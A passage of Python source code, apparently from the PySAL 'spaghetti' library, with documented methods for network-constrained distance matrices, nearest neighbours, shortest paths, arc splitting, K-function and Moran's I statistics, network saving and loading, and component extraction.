vertex to query the lookup tree. If two observations are
snapped to the same network arc a flag of -.1 is set for
both the source and destination network vertex
indicating the same arc is used while also raising an
``IndexError`` when rebuilding the path.
Examples
--------
Create a network instance.
>>> import spaghetti
>>> from libpysal import examples
>>> import numpy
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(
... examples.get_path("crimes.shp"), "crimes", attribute=True
... )
Calculate all distances between observations in the ``crimes`` dataset.
>>> s2s_dist = ntw.allneighbordistances("crimes")
If calculating a ``type-a`` to ``type-a`` distance matrix
the distance between an observation and itself is ``nan`` and
the distance between one observation and another will be positive value.
>>> s2s_dist[0,0], s2s_dist[1,0]
(nan, 3105.189475447081)
If calculating a ``type-a`` to ``type-b`` distance matrix
the distance between all observations will likely be positive
values, may be zero (or approximately zero), but will never be negative.
>>> ntw.snapobservations(
... examples.get_path("schools.shp"), "schools", attribute=False
... )
>>> s2d_dist = ntw.allneighbordistances("crimes", destpattern="schools")
>>> numpy.round((s2d_dist[0,0], s2d_dist[1,0]), 5)
array([4520.72354, 6340.42297])
Shortest paths can also be reconstructed when desired by
setting the ``gen_tree`` keyword argument to ``True``. Here
it is shown that the shortest path between school ``6`` and
school ``7`` flows along network arcs through network
vertices ``173`` and ``64``. The ``ntw.network_trees`` attribute
may then be queried for the network elements comprising that path.
>>> d2d_dist, tree = ntw.allneighbordistances("schools", gen_tree=True)
>>> tree[(6, 7)]
(173, 64)
"""
# calculate the network vertex to vertex distance matrix
# if it is not already an attribute
if not hasattr(self, "distance_matrix"):
self.full_distance_matrix(n_processes, gen_tree=gen_tree)
# set the source and destination observation point patterns
if type(sourcepattern) is str:
sourcepattern = self.pointpatterns[sourcepattern]
if destpattern:
destpattern = self.pointpatterns[destpattern]
# source pattern setup
# set local copy of source pattern index
src_indices = list(sourcepattern.points.keys())
# set local copy of source distance to vertex lookup
src_d2v = copy.deepcopy(sourcepattern.dist_to_vertex)
# source point count
nsource_pts = len(src_indices)
# create source point to network vertex lookup
src_vertices = {}
for s in src_indices:
v1, v2 = src_d2v[s].keys()
src_vertices[s] = (v1, v2)
# destination pattern setup
# if only a source pattern is specified, also set it as
# the destination pattern
symmetric = False
if destpattern is None:
symmetric = True
destpattern = sourcepattern
# set local copy of destination pattern index
dest_indices = list(destpattern.points.keys())
# set local copy of destination distance to vertex lookup
dst_d2v = copy.deepcopy(destpattern.dist_to_vertex)
# destination point count
ndest_pts = len(dest_indices)
# create `deepcopy` of destination points to
# consider for searching
dest_searchpts = copy.deepcopy(dest_indices)
# create destination point to network vertex lookup
dest_vertices = {}
for s in dest_indices:
v1, v2 = dst_d2v[s].keys()
dest_vertices[s] = (v1, v2)
# add snapping distance to each pointpattern
if snap_dist:
# declare both point patterns and both
# distance to vertex lookup in single lists
patterns = [sourcepattern, destpattern]
dist_copies = [src_d2v, dst_d2v]
# iterate over each point pattern
for elm, pp in enumerate(patterns):
# extract associated vertex distances
for pidx, dists_dict in dist_copies[elm].items():
# add snapped distance to each point
for vidx, vdist in dists_dict.items():
dists_dict[vidx] = vdist + pp.dist_snapped[pidx]
# output setup
# create empty source x destination array
# and fill with infinity values
nearest = numpy.empty((nsource_pts, ndest_pts))
nearest[:] = numpy.inf
# create empty dictionary to store path trees
tree_nearest = {}
# iterate over each point in sources
for p1 in src_indices:
# get the source vertices and dist to source vertices
source1, source2 = src_vertices[p1]
set1 = set(src_vertices[p1])
# distance from source vertex1 to point and
# distance from source vertex2 to point
sdist1, sdist2 = src_d2v[p1].values()
if symmetric:
# only compute the upper triangle if symmetric
dest_searchpts.remove(p1)
# iterate over each point remaining in destinations
for p2 in dest_searchpts:
# get the destination vertices and
# dist to destination vertices
dest1, dest2 = dest_vertices[p2]
set2 = set(dest_vertices[p2])
# when the observations are snapped to the same arc
if set1 == set2:
# calculate only the length between points along
# that arc
x1, y1 = sourcepattern.snapped_coordinates[p1]
x2, y2 = destpattern.snapped_coordinates[p2]
computed_length = util.compute_length((x1, y1), (x2, y2))
nearest[p1, p2] = computed_length
# set the nearest network vertices to a flag of -.1
# indicating the same arc is used while also raising
# and indexing error when rebuilding the path
tree_nearest[p1, p2] = SAME_SEGMENT
# otherwise lookup distance between the source and
# destination vertex
else:
# distance from destination vertex1 to point and
# distance from destination vertex2 to point
ddist1, ddist2 = dst_d2v[p2].values()
# set the four possible combinations of
# source to destination shortest path traversal
d11 = self.distance_matrix[source1][dest1]
d21 = self.distance_matrix[source2][dest1]
d12 = self.distance_matrix[source1][dest2]
d22 = self.distance_matrix[source2][dest2]
# find the shortest distance from the path passing
# through each of the two origin vertices to the
# first destination vertex
sd_1 = d11 + sdist1
sd_21 = d21 + sdist2
sp_combo1 = source1, dest1
if sd_1 > sd_21:
sd_1 = sd_21
sp_combo1 = source2, dest1
# now add the point to vertex1 distance on
# the destination arc
len_1 = sd_1 + ddist1
# repeat the prior but now for the paths entering
# at the second vertex of the second arc
sd_2 = d12 + sdist1
sd_22 = d22 + sdist2
sp_combo2 = source1, dest2
if sd_2 > sd_22:
sd_2 = sd_22
sp_combo2 = source2, dest2
len_2 = sd_2 + ddist2
# now find the shortest distance path between point
# 1 on arc 1 and point 2 on arc 2, and assign
sp_12 = len_1
s_vertex, d_vertex = sp_combo1
if len_1 > len_2:
sp_12 = len_2
s_vertex, d_vertex = sp_combo2
# set distance and path tree
nearest[p1, p2] = sp_12
tree_nearest[p1, p2] = (s_vertex, d_vertex)
if symmetric:
# mirror the upper and lower triangle
# when symmetric
nearest[p2, p1] = nearest[p1, p2]
# populate the main diagonal when symmetric
if symmetric:
# fill the matrix diagonal with NaN values is no fill
# value is specified
if fill_diagonal is None:
numpy.fill_diagonal(nearest, numpy.nan)
# otherwise fill with specified value
else:
numpy.fill_diagonal(nearest, fill_diagonal)
# if the nearest path tree is desired return it along
# with the cost matrix
if gen_tree:
return nearest, tree_nearest
else:
return nearest
def nearestneighbordistances(
self,
sourcepattern,
destpattern=None,
n_processes=1,
gen_tree=False,
all_dists=None,
snap_dist=False,
keep_zero_dist=True,
):
"""Compute the interpattern nearest neighbor distances or the
intrapattern nearest neighbor distances between a source
pattern and a destination pattern.
Parameters
----------
sourcepattern : str
The key of a point pattern snapped to the network.
destpattern : str
(Optional) The key of a point pattern snapped to the
network.
n_processes : {int, str}
Specify the number of cores to utilize. Default is 1 core.
Use ``"all"`` to request all available cores.
Specify the exact number of cores with an integer.
gen_tree : bool
Rebuild shortest path ``True``, or skip ``False``.
Default is ``False``.
all_dists : numpy.ndarray
An array of shape :math:`(n,n)` storing distances between all
points.
snap_dist : bool
Flag as ``True`` to include the distance from the original
location to the snapped location along the network. Default
is ``False``.
keep_zero_dist : bool
Include zero values in minimum distance ``True`` or exclude
``False``. Default is ``True``. If the source pattern is the
same as the destination pattern the diagonal is filled with
``numpy.nan``.
Returns
-------
nearest : dict
Nearest neighbor distances keyed by the source point ID with
the value as as tuple of lists containing
nearest destination point ID(s) and distance.
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(examples.get_path("crimes.shp"), "crimes")
Fetch nearest neighbor distances while (potentially)
keeping neighbors that have been geocoded directly on top of
each other. Here it is demonstrated that observation ``11``
has two neighbors (``18`` and ``19``) at an exactly equal distance.
However, observation ``18`` is shown to have only one neighbor
(``18``) with no distance between them.
>>> nn = ntw.nearestneighbordistances("crimes", keep_zero_dist=True)
>>> nn[11], nn[18]
(([18, 19], 165.33982412719126), ([19], 0.0))
This may be remedied by setting the ``keep_zero_dist`` keyword
argument to ``False``. With this parameter set, observation ``11``
still has the same neighbor/distance values, but
observation ``18`` now has a single nearest neighbor (``11``)
with a non-zero, postive distance.
>>> nn = ntw.nearestneighbordistances("crimes", keep_zero_dist=False)
>>> nn[11], nn[18]
(([18, 19], 165.33982412719126), ([11], 165.33982412719126))
There are valid reasons for both retaining or masking zero distance
neighbors. When conducting analysis, thought must be given as to
which model more accurately represents the specific scenario.
"""
# raise exception is the specified point pattern does not exist
if sourcepattern not in self.pointpatterns.keys():
err_msg = "Available point patterns are {}"
raise KeyError(err_msg.format(self.pointpatterns.keys()))
# calculate the network vertex to vertex distance matrix
# if it is not already an attribute
if not hasattr(self, "distance_matrix"):
self.full_distance_matrix(n_processes, gen_tree=gen_tree)
# determine if the source and destination patterns are equal
symmetric = sourcepattern != destpattern
# (for source-to-source patterns) if zero-distance neighbors are
# desired, keep the diagonal as NaN and take the minimum
# distance neighbor(s), which may include zero distance
# neighors.
fill_diagonal = None
if not keep_zero_dist and symmetric:
# (for source-to-source patterns) if zero-distance neighbors
# should be ignored, convert the diagonal to 0.0 and take
# the minimum distance neighbor(s) that is/are not 0.0
# distance.
fill_diagonal = 0.0
# set the source and destination observation point patterns
sourcepattern = self.pointpatterns[sourcepattern]
if destpattern:
destpattern = self.pointpatterns[destpattern]
# if the full source to destination is not calculated,
# do that at this time
if all_dists is None:
all_dists = self.allneighbordistances(
sourcepattern,
destpattern=destpattern,
fill_diagonal=fill_diagonal,
n_processes=n_processes,
gen_tree=gen_tree,
snap_dist=snap_dist,
)
# create empty nearest neighbors lookup
nearest = {}
# iterate over each source point
for source_index in sourcepattern.points.keys():
# this considers all zero-distance neighbors
if keep_zero_dist and symmetric:
val = numpy.nanmin(all_dists[source_index, :])
# this does not consider zero-distance neighbors
else:
val = numpy.min(
all_dists[source_index, :][
numpy.nonzero(all_dists[source_index, :])
]
)
# nearest destination (may be more than one if
# observations are equal distances away)
dest_idxs = numpy.where(all_dists[source_index, :] == val)[0].tolist()
# set nearest destination point(s) and distance
nearest[source_index] = (dest_idxs, val)
return nearest
def shortest_paths(self, tree, pp_orig, pp_dest=None, n_processes=1):
"""Return the shortest paths between observation points as
``libpysal.cg.Chain`` objects.
Parameters
----------
tree : dict
See ``tree_nearest`` in
``spaghetti.Network.allneighbordistances()``.
pp_orig : str
Origin point pattern for shortest paths.
See ``name`` in ``spaghetti.Network.snapobservations()``.
pp_dest : str
Destination point pattern for shortest paths.
See ``name`` in ``spaghetti.Network.snapobservations()``.
Defaults ``pp_orig`` if not declared.
n_processes : int
See ``n_processes`` in ``spaghetti.Network.full_distance_matrix()``.
Returns
-------
paths : list
The shortest paths between observations as geometric objects.
Each element of the list is a list where the first element
is an origin-destination pair tuple and the second
element is a ``libpysal.cg.Chain``.
Raises
------
AttributeError
This exception is raised when an attempt to extract shortest
path geometries is being made that but the ``network_trees``
attribute does not exist within the network object.
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(examples.get_path("schools.shp"), "schools")
Create shortest path trees between observations.
>>> _, tree = ntw.allneighbordistances("schools", gen_tree=True)
Generate geometric objects from trees.
>>> paths = ntw.shortest_paths(tree, "schools")
Extract the first path, which is between observations
``0`` and ``1``.
>>> path = paths[0]
>>> path[0]
(0, 1)
The are ``n`` vertices in the path between observations
``0`` and ``1``.
>>> n = len(path[1].vertices)
>>> n
10
"""
# build the network trees object if it is not already an attribute
if not hasattr(self, "network_trees"):
msg = "The 'network_trees' attribute has not been created. "
msg += "Rerun 'spaghetti.Network.allneighbordistances()' "
msg += "with the 'gen_tree' parameter set to 'True'."
raise AttributeError(msg)
# isolate network attributes
pp_orig = self.pointpatterns[pp_orig]
if pp_dest:
pp_dest = self.pointpatterns[pp_dest]
else:
pp_dest = pp_orig
vtx_coords = self.vertex_coords
net_trees = self.network_trees
# instantiate a list to store paths
paths = []
# iterate over each path in the tree
for idx, ((obs0, obs1), (v0, v1)) in enumerate(tree.items()):
# if the observations share the same segment
# create a partial segment path
if (v0, v1) == SAME_SEGMENT:
# isolate the snapped coordinates and put in a list
partial_segment_verts = [
cg.Point(pp_orig.snapped_coordinates[obs0]),
cg.Point(pp_dest.snapped_coordinates[obs1]),
]
path = partial_segment_verts
else:
# source and destination network vertices
svtx, dvtx = tree[obs0, obs1]
# path passes through these nodes
# (source and destination inclusive)
thru_nodes = net_trees[svtx][dvtx][::-1] + [dvtx]
# full-length network segments along path
full_segs_path = []
iter_limit = len(thru_nodes) - 1
for _idx, item in enumerate(islice(thru_nodes, iter_limit)):
full_segs_path.append((item, thru_nodes[_idx + 1]))
# create copy of arc paths dataframe
full_segments = []
for fsp in full_segs_path:
full_segments.append(util._chain_constr(vtx_coords, fsp))
# unpack the vertices containers
segm_verts = [v for fs in full_segments for v in fs.vertices]
# remove duplicate vertices
for idx, v in enumerate(segm_verts):
try:
if v == segm_verts[idx + 1]:
segm_verts.remove(v)
except IndexError as e:
if e.args[0] == "list index out of range":
continue
else:
raise
# partial-length network segments along path
partial_segment_verts = [
cg.Point(pp_orig.snapped_coordinates[obs0]),
cg.Point(pp_dest.snapped_coordinates[obs1]),
]
# combine the full and partial segments into a single list
first_vtx, last_vtx = partial_segment_verts
path = [first_vtx] + segm_verts + [last_vtx]
# populate the ``paths`` dataframe
paths.append([(obs0, obs1), util._chain_constr(None, path)])
return paths
def split_arcs(self, split_param, split_by="distance", w_components=True):
"""Split all network arcs at either a fixed distance or fixed count.
Parameters
-----------
split_param : {int, float}
Either the number of desired resultant split arcs or
the distance at which arcs are split.
split_by : str
Either ``'distance'`` or ``'count'``. Default is ``'distance'``.
w_components : bool
Set to ``False`` to not record connected components from a
``libpysal.weights.W`` object. Default is ``True``.
Returns
-------
split_network : spaghetti.Network
A newly instantiated ``spaghetti.Network`` object.
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Split the network into a segments of 200 distance units in length
(`US feet in this case <https://github.com/pysal/libpysal/blob/master/libpysal/examples/geodanet/streets.prj>`_.).
This will include "remainder" segments unless the network is
comprised of arcs with lengths exactly divisible by ``distance``.
>>> n200 = ntw.split_arcs(200.0)
>>> len(n200.arcs)
688
The number of arcs within the new object can be accessed via the
weights object, as well. These counts will be equal.
>>> len(n200.arcs) == n200.w_network.n
True
Neighboring arcs can also be queried through the weight object.
>>> n200.w_network.neighbors[72,392]
[(71, 72), (72, 252), (72, 391), (392, 393)]
Network arcs can also be split by a specified number of divisions with
the ``split_by`` keyword set to ``'count'``, which is ``'distance'`` by
default. For example, each arc can be split into 2 equal parts.
>>> n2 = ntw.split_arcs(2, split_by="count")
>>> len(n2.arcs)
606
"""
# catch invalid split types
split_by = split_by.lower()
valid_split_types = ["distance", "count"]
if split_by not in valid_split_types:
msg = f"'{split_by}' is not a valid value for 'split_by'. "
msg += f"Valid arguments include: {valid_split_types}."
raise ValueError(msg)
# catch invalid count params
if split_by == "count":
if split_param <= 1:
msg = "Splitting arcs by 1 or less is not possible. "
msg += f"Currently 'split_param' is set to {split_param}."
raise ValueError(msg)
split_integer = int(split_param)
if split_param != split_integer:
msg = "Network arcs must split by an integer. "
msg += f"Currently 'split_param' is set to {split_param}."
raise TypeError(msg)
# convert coordinates for integers if possible
# e.g., (1.0, 0.5) --> (1, 0.5)
int_coord = lambda c: int(c) if (type(c) == float and c.is_integer()) else c
# create new shell network instance
split_network = Network()
# duplicate input network attributes
split_network.adjacencylist = copy.deepcopy(self.adjacencylist)
split_network.arc_lengths = copy.deepcopy(self.arc_lengths)
split_network.arcs = copy.deepcopy(self.arcs)
split_network.vertex_coords = copy.deepcopy(self.vertex_coords)
split_network.vertex_list = copy.deepcopy(self.vertex_list)
split_network.vertices = copy.deepcopy(self.vertices)
split_network.pointpatterns = copy.deepcopy(self.pointpatterns)
split_network.in_data = self.in_data
# set vertex ID to start iterations
current_vertex_id = max(self.vertices.values())
# instantiate sets for newly created network arcs and
# input network arcs to remove
new_arcs = set()
remove_arcs = set()
# iterate over all network arcs
for arc in split_network.arcs:
# fetch network arc length
length = split_network.arc_lengths[arc]
# set initial segmentation interval
if split_by == "distance":
interval = split_param
else:
interval = length / float(split_param)
# initialize arc new arc length at zero
totallength = 0
# initialize the current vertex and ending vertex
currentstart, end_vertex = arc[0], arc[1]
# determine direction of arc vertices
csx, csy = split_network.vertex_coords[currentstart]
evx, evy = split_network.vertex_coords[end_vertex]
if csy > evy and csx == evx:
currentstart, end_vertex = end_vertex, currentstart
# if the arc will be split remove the current
# arc from the adjacency list
if interval < length:
# remove old arc adjacency information
split_network.adjacencylist[currentstart].remove(end_vertex)
split_network.adjacencylist[end_vertex].remove(currentstart)
# remove old arc length information
split_network.arc_lengths.pop(arc, None)
# add old arc to set of arcs to remove
remove_arcs.add(arc)
# if the arc will not be split, do nothing and continue
else:
continue
# traverse the length of the arc
while totallength < length:
# once an arc can not be split further
if totallength + interval >= length:
# record the ending vertex
currentstop = end_vertex
# set the length remainder
interval = length - totallength
# full old length reached
totallength = length
else:
# set the current vertex ID
current_vertex_id += 1
# set the current stopping ID
currentstop = current_vertex_id
# add the interval distance to the traversed length
totallength += interval
# compute the new vertex coordinate
newx, newy = self._newpoint_coords(arc, totallength)
new_vertex = (int_coord(newx), int_coord(newy))
# update the vertex and coordinate info if needed
if new_vertex not in split_network.vertices.keys():
split_network.vertices[new_vertex] = currentstop
split_network.vertex_coords[currentstop] = new_vertex
split_network.vertex_list.append(currentstop)
else:
# retrieve vertex ID if coordinate already exists
current_vertex_id -= 1
currentstop = split_network.vertices[new_vertex]
# update the new network adjacency list
split_network.adjacencylist[currentstart].append(currentstop)
split_network.adjacencylist[currentstop].append(currentstart)
# add the new arc to the arc dictionary
# iterating over this so we need to add after iterating
_new_arc = tuple(sorted([currentstart, currentstop]))
new_arcs.add(_new_arc)
# set the length of the arc
split_network.arc_lengths[_new_arc] = interval
# increment the starting vertex to the stopping vertex
currentstart = currentstop
# add the newly created arcs to the network and remove the old arcs
split_network.arcs = set(split_network.arcs)
split_network.arcs.update(new_arcs)
split_network.arcs.difference_update(remove_arcs)
split_network.arcs = sorted(list(split_network.arcs))
# extract connected components
if w_components:
# extract contiguity weights from libpysal
split_network.w_network = split_network.contiguityweights(
graph=False, from_split=True
)
# identify connected components from the `w_network`
split_network.identify_components(split_network.w_network, graph=False)
# update the snapped point pattern
for instance in split_network.pointpatterns.values():
split_network._snap_to_link(instance)
return split_network
def GlobalAutoK(
self,
pointpattern,
nsteps=10,
permutations=99,
threshold=0.5,
distribution="uniform",
upperbound=None,
):
r"""Compute a global auto :math:`K`-function based on a network constrained
cost matrix through `Monte Carlo simulation <https://en.wikipedia.org/wiki/Monte_Carlo_method>`_
according to the formulation adapted from
:cite:`doi:10.1002/9780470549094.ch5`. See the **Notes**
section for further description.
Parameters
----------
pointpattern : spaghetti.PointPattern
A ``spaghetti`` point pattern object.
nsteps : int
The number of steps at which the count of the nearest
neighbors is computed. Default is ``10``.
permutations : int
The number of permutations to perform. Default is ``99``.
threshold : float
The level at which significance is computed.
(0.5 would be 97.5% and 2.5%). Default is ``0.5``.
distribution : str
The distribution from which random points are sampled.
Currently, the only supported distribution is ``'uniform'``.
upperbound : float
The upper bound at which the :math:`K`-function is computed.
Defaults to the maximum observed nearest neighbor distance.
Returns
-------
GlobalAutoK : spaghetti.analysis.GlobalAutoK
The global auto :math:`K`-function class instance.
Notes
-----
The :math:`K`-function can be formulated as:
.. math::
\displaystyle K(r)=\frac{\sum^n_{i=1} \#[\hat{A} \in D(a_i, r)]}{n\lambda},
where $n$ is the set cardinality of :math:`A`, :math:`\hat{A}` is the subset of
observations in :math:`A` that are within :math:`D` units of distance from :math:`a_i`
(each single observation in :math:`A`), and :math:`r` is the range of distance
values over which the :math:`K`-function is calculated. The :math:`\lambda` term
is the intensity of observations along the network, calculated as:
.. math::
\displaystyle \lambda = \frac{n}{\big|N_{arcs}\big|},
where :math:`\big|N_{arcs}\big|` is the summed length of network arcs.
The global auto :math:`K`-function measures overall clustering in one set of
observations by comparing all intra-set distances over a range of
distance buffers :math:`D \in r`. The :math:`K`-function improves upon
nearest-neighbor distance measures through the analysis of all neighbor
distances. For an explanation on how to interpret the results of the
:math:`K`-function see the `Network Spatial Dependence tutorial <https://pysal.org/spaghetti/notebooks/network-spatial-dependence.html>`_.
For original implementation see :cite:`Ripley1976`
and :cite:`Ripley1977`.
For further Network-`K` formulations see
:cite:`doi:10.1111/j.1538-4632.2001.tb00448.x`,
:cite:`doi:10.1002/9781119967101.ch6`, and
:cite:`Baddeley2020`.
See also
--------
pointpats.K
Examples
--------
Create a network instance.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(in_data=examples.get_path("streets.shp"))
Snap observation points onto the network.
>>> pt_str = "schools"
>>> in_data = examples.get_path(pt_str+".shp")
>>> ntw.snapobservations(in_data, pt_str, attribute=True)
>>> schools = ntw.pointpatterns[pt_str]
Compute a :math:`K`-function from school observations
with ``99`` ``permutations`` at ``10`` intervals.
>>> kres = ntw.GlobalAutoK(schools, permutations=99, nsteps=10)
>>> kres.lowerenvelope.shape[0]
10
"""
# call analysis.GlobalAutoK
return GlobalAutoK(
self,
pointpattern,
nsteps=nsteps,
permutations=permutations,
threshold=threshold,
distribution=distribution,
upperbound=upperbound,
)
def Moran(self, pp_name, permutations=999, graph=False):
"""Calculate a Moran's *I* statistic on a set of observations
based on network arcs. The Moran’s *I* test statistic allows
for the inference of how clustered (or dispersed) a dataset is
while considering both attribute values and spatial relationships.
A value of closer to +1 indicates absolute clustering while a
value of closer to -1 indicates absolute dispersion. Complete
spatial randomness takes the value of 0. See the
`esda documentation <https://pysal.org/esda/generated/esda.Moran.html#esda.Moran>`_
for in-depth descriptions and tutorials.
Parameters
----------
pp_name : str
The name of the point pattern in question.
permutations : int
The number of permutations to perform. Default is ``999``.
graph : bool
Perform the Moran calculation on the graph `W` object
(``True``). Default is ``False``, which performs the
Moran calculation on the network `W` object.
Returns
-------
moran : esda.Moran
A Moran's *I* statistic object results.
y : list
The y-axis (counts).
Examples
--------
Create a network instance.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(in_data=examples.get_path("streets.shp"))
Snap observation points onto the network.
>>> crimes = "crimes"
>>> in_data = examples.get_path(crimes+".shp")
>>> ntw.snapobservations(in_data, crimes, attribute=True)
Compute a Moran's :math:`I` from crime observations.
>>> moran_res, _ = ntw.Moran(crimes)
>>> round(moran_res.I, 6)
0.005193
Notes
-----
See :cite:`moran:_cliff81` and :cite:`esda:_2019` for more details.
"""
# set proper weights attribute
if graph:
w = self.w_graph
else:
w = self.w_network
# Compute the counts
pointpat = self.pointpatterns[pp_name]
counts = self.count_per_link(pointpat.obs_to_arc, graph=graph)
# Build the y vector
y = [counts[i] if i in counts else 0.0 for i in w.neighbors]
# Moran's I
moran = esda.moran.Moran(y, w, permutations=permutations)
return moran, y
def savenetwork(self, filename):
"""Save a network to disk as a binary file.
Parameters
----------
filename : str
The filename where the network should be saved. This should
be a full path or it will be saved in the current directory.
Examples
--------
Create a network instance.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Save out the network instance.
>>> ntw.savenetwork("mynetwork.pkl")
"""
with open(filename, "wb") as networkout:
pickle.dump(self, networkout, protocol=2)
@staticmethod
def loadnetwork(filename):
"""Load a network from a binary file saved on disk.
Parameters
----------
filename : str
The filename where the network is saved.
Returns
-------
self : spaghetti.Network
A pre-computed ``spaghetti`` network object.
"""
with open(filename, "rb") as networkin:
self = pickle.load(networkin)
return self
def extract_component(net, component_id, weightings=None):
"""Extract a single component from a network object.
Parameters
----------
net : spaghetti.Network
Full network object.
component_id : int
The ID of the desired network component.
weightings : {dict, bool}
See the ``weightings`` keyword argument in ``spaghetti.Network``.
Returns
-------
cnet : spaghetti.Network
The pruned network containing the component specified in
``component_id``.
Notes
-----
Point patterns are not reassigned when extracting a component. Therefore,
component extraction should be performed prior to snapping any point
sets onto the network. Also, if the ``spaghetti.Network`` object
has ``distance_matrix`` or ``network_trees`` attributes, they are
deleted and must be computed again on the single component.
Examples
--------
Instantiate a network object.
>>> from libpysal import examples
>>> import spaghetti
>>> snow_net = examples.get_path("Soho_Network.shp")
>>> ntw = spaghetti.Network(in_data=snow_net, extractgraph=False)
The network is not fully connected.
>>> ntw.network_fully_connected
False
Examine the number of network components.
>>> ntw.network_n_components
45
Extract the longest component.
>>> longest = spaghetti.extract_component(ntw, ntw.network_longest_component)
>>> longest.network_n_components
1
>>> longest.network_component_lengths
{0: 13508.169276875526}
"""
def _reassign(attr, cid):
"""Helper for reassigning attributes."""
# set for each attribute(s)
if attr == "_fully_connected":
_val = [True for objt in obj_type]
attr = [objt + attr for objt in obj_type]
elif attr == "_n_components":
_val = [1 for objt in obj_type]
attr = [objt + attr for objt in obj_type]
elif attr in ["_longest_component", "_largest_component"]:
_val = [cid for objt in obj_type]
attr = [objt + attr for objt in obj_type]
elif attr == "vertex_list":
# reassigns vertex list + network, graph component vertices
supp = [objt + "_component_vertices" for objt in obj_type]
_val = [getattr(cnet, supp[0])[cid]]
_val += [{cid: getattr(cnet, s)[cid]} for s in supp]
attr = [attr] + supp
elif attr == "vertex_coords":
# reassigns both vertex_coords and vertices
supp = getattr(cnet, "vertex_list")
_val = [{k: v for k, v in getattr(cnet, attr).items() if k in supp}]
_val += [{v: k for k, v in _val[0].items()}]
attr = [attr, "vertices"]
elif attr == "_component_vertex_count":
# reassigns both network and graph _component_vertex_count
supp = len(getattr(cnet, "vertex_list"))
_val = [{cid: supp} for objt in obj_type]
attr = [objt + attr for objt in obj_type]
elif attr == "adjacencylist":
supp_adj = copy.deepcopy(list(getattr(cnet, attr).keys()))
supp_vtx = getattr(cnet, "vertex_list")
supp_rmv = [v for v in supp_adj if v not in supp_vtx]
[getattr(cnet, attr).pop(s) for s in supp_rmv]
return
elif attr == "_component_is_ring":
# reassigns both network and graph _component_is_ring
supp = [getattr(cnet, objt + attr) for objt in obj_type]
_val = [{cid: s[cid]} for s in supp]
attr = [objt + attr for objt in obj_type]
elif attr == "non_articulation_points":
supp_vtx = getattr(cnet, "vertex_list")
_val = [[s for s in getattr(cnet, attr) if s in supp_vtx]]
attr = [attr]
elif attr == "_component2":
# reassigns both network and graph _component2 attributes
supp = [_n + "_component2" + _a]
if hasgraph:
supp += [_g + "_component2" + _e]
_val = [{cid: getattr(cnet, s)[cid]} for s in supp]
attr = supp
elif attr == "arcs":
# reassigns both arcs and edges
c2 = "_component2"
supp = [_n + c2 + _a]
if hasgraph:
supp += [_g + c2 + _e]
_val = [getattr(cnet, s)[cid] for s in supp]
attr = [attr]
if hasgraph:
attr += ["edges"]
elif attr == "_component_labels":
# reassigns both network and graph _component_labels
supp = [len(getattr(cnet, o + "s")) for o in obj]
_val = [numpy.array([cid] * s) for s in supp]
attr = [objt + attr for objt in obj_type]
elif attr == "_component_lengths":
# reassigns both network and graph _component_lengths
supp = [objt + attr for objt in obj_type]
_val = [{cid: getattr(cnet, s)[cid]} for s in supp]
attr = supp
elif attr == "_lengths":
# reassigns both arc and edge _lengths
supp_name = [o + attr for o in obj]
supp_lens = [getattr(cnet, s) for s in supp_name]
supp_link = [getattr(cnet, o + "s") for o in obj]
supp_ll = list(zip(supp_lens, supp_link))
_val = [{k: v for k, v in l1.items() if k in l2} for l1, l2 in supp_ll]
attr = supp_name
# reassign attributes
for a, av in zip(attr, _val):
setattr(cnet, a, av)
# provide warning (for now) if the network contains a point pattern
if getattr(net, "pointpatterns"):
msg = "There is a least one point pattern associated with the network."
msg += " Component extraction should be performed prior to snapping"
msg += " point patterns to the network object; failing to do so may"
msg += " lead to unexpected results."
warnings.warn(msg)
# provide warning (for now) if the network contains a point pattern
dm, nt = "distance_matrix", "network_trees"
if hasattr(net, dm) or hasattr(net, nt):
msg = "Either one or both (%s, %s) attributes" % (dm, nt)
msg += " are present and will be deleted. These must be"
msg += " recalculated following component extraction."
warnings.warn(msg)
for attr in [dm, nt]:
if hasattr(net, attr):
_attr = getattr(net, attr)
del _attr
# make initial copy of the network
cnet = copy.deepcopy(net)
# set labels
_n, _a, _g, _e = "network", "arc", "graph", "edge"
obj_type = [_n]
obj = [_a]
hasgraph = False
if hasattr(cnet, "w_graph"):
obj_type += [_g]
obj += [_e]
hasgraph = True
# attributes to reassign
update_attributes = [
"_fully_connected",
"_n_components",
"_longest_component",
"_largest_component",
"vertex_list",
"vertex_coords",
"_component_vertex_count",
"adjacencylist",
"_component_is_ring",
"_component2",
"arcs",
"_component_lengths",
"_lengths",
"_component_labels",
]
if hasgraph:
update_attributes.append("non_articulation_points")
# reassign attributes
for attribute in update_attributes:
_reassign(attribute, component_id)
# recreate spatial weights
cnet.w_network = cnet.contiguityweights(graph=False, weightings=weightings)
if hasgraph:
cnet.w_graph = cnet.contiguityweights(graph=True, weightings=weightings)
return cnet
def spanning_tree(net, method="sort", maximum=False, silence_warnings=True):
"""Extract a minimum or maximum spanning tree from a network.
Parameters
----------
net : spaghetti.Network
Instance of a network object.
method : str
Method for determining spanning tree. Currently, the only
supported method is 'sort', which sorts the network arcs
by length prior to building intermediary networks and checking
for cycles within the tree/subtrees. Future methods may
include linear programming approachs, etc.
maximum : bool
When ``True`` a maximum spanning tree is created. When ``False``
a minimum spanning tree is created. Default is ``False``.
silence_warnings : bool
Warn if there is more than one connected component. Default is
``False`` due to the nature of constructing a minimum
spanning tree.
Returns
-------
net : spaghetti.Network
Pruned instance of the network object.
Notes
-----
For in-depth background and details see
:cite:`GrahamHell_1985`,
:cite:`AhujaRavindraK`, and
:cite:`Okabe2012`.
See also
--------
networkx.algorithms.tree.mst
scipy.sparse.csgraph.minimum_spanning_tree
Examples
--------
Create a network instance.
>>> from libpysal import cg
>>> import spaghetti
>>> p00 = cg.Point((0,0))
>>> lines = [cg.Chain([p00, cg.Point((0,3)), cg.Point((4,0)), p00])]
